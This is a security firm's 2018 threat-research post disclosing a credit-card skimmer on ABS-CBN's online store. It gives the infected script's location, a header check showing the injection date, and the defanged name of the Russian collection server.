ABS-CBN next in series of high profile breaches
by Sansec Forensics Team
Published in Threat Research − September 18, 2018
ABS-CBN headquarters
While Filipinos are recovering from typhoon Mangkhut, another misfortune awaits them online. We found their broadcasting giant ABS-CBN − a $740 million conglomerate & top-500 global Internet destination − to be hacked. Criminals are running a payment skimmer on ABS-CBNs online store since at least August 16th. Personal information and credit cards are intercepted while people shop for merchandise for one of the 90+ television shows. The stolen data is sent onwards to a server registered in Irkutsk, Russia. The credit cards and identities are then (presumably) sold on the black market.
ABS-CBN is the latest target in a series of high profile skimming operations. Previously, British Airways and Ticketmaster admitted massive credit card theft of their customers. The methodology found at these crime scenes is the same: browser-based interception during the checkout process. This method is quickly gaining popularity because it defeats the security of encrypted connections (https/SSL).
Filipinos are recommended to carefully check their credit card statements for unauthorized payments.
We have notified ABS-CBN of the breach, but have not received a response.
Technical details
Sansec discovered the fraud campaign with newly released malware detection heuristics. The (obfuscated) malware is located at store.abs-cbn.com/js/lib/ccard.js (archive.org). This specific file has not been modified since four weeks, suggesting the malware was injected on or before August 16th.
$ curl -v https://store.abs-cbn.com/js/lib/ccard.js
< Last-Modified: Thu, 16 Aug 2018 06:24:34 GMT
The malware sends its stolen data to a payment collection server called adaptivecss[.]org.
![adaptivecss[.]org](/assets/posts/cache/d6084b1d7ef18872f5714cf41cf5f236.png)
This server is on the same Russian network as coffemokko.com, a different malware campaign that we discovered earlier this week:
Just discovered the curiously named "Coffe&Tea" malware campaign. CC servers at https://t.co/pS6O7mXCbm, https://t.co/7i8JqZcNXf, https://t.co/yCiImbSyfY. They have open dirs so you can list the fake payment popups per victim. Do you recognize any of them? pic.twitter.com/TFIr4qrHjm
— Willem de Groot (@gwillem) September 13, 2018
Read more
- SessionReaper attacks have started, 3 in 5 stores still vulnerable
- SessionReaper, unauthenticated RCE in Magento & Adobe Commerce (CVE-2025-54236)
- Adobe patches critical Magento admin takeover via menu injection
- Backdoor found in popular ecommerce components
- Found defunct.dat on your site? You've got a problem.
In this article
Protect your store now!
Block all known Magento attacks, while you schedule the latest critical patch until a convenient moment. No more downtime and instability from rushed patching.
Get Sansec ShieldScan your store now
for malware & vulnerabilities
eComscan is the most thorough security scanner for Magento, Adobe Commerce, Shopware, WooCommerce and many more.
Learn more
